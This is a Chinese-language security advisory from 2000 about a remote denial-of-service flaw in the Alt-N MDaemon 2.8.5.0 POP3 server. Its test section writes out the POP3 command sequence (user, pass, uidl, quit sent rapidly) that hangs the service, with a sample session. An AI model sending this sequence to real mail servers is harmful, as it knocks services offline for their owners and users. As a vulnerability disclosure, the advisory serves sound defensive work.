发布日期：2000-06-21
更新日期：2000-06-21

受影响系统：

Alt-N Mdaemon 2.8.50
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0

不受影响系统：

Alt-N MDaemon 3.0.4

描述：

---

Alt-N的MDaemon是Windows系统下的POP3 Server软件。它的2.8.5.0版存在一个远程拒绝
服务的漏洞。在UIDL返回响应信息以前，尽可能快的执行user,pass,uidl,quit命令，
这将导致MDaemon服务停止响应，必须重新启动。

<* 来源: Craig <Craig@FREENET.DE> *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

尽可能快的执行下列命令

+OK <target> POP service ready using MDaemon
v2.8.5.0 T

User <username>
+OK <username>... Recipient ok
pass <password>
-ERR that command is valid only in the AUTHORIZATION state!
uidl
-ERR unknown POP command!
quit
+OK
.
quit
+OK <username> <target> POP Server signing off (mailbox empty)







建议：

---

暂无

浏览次数：6404
严重程度：0（网友投票）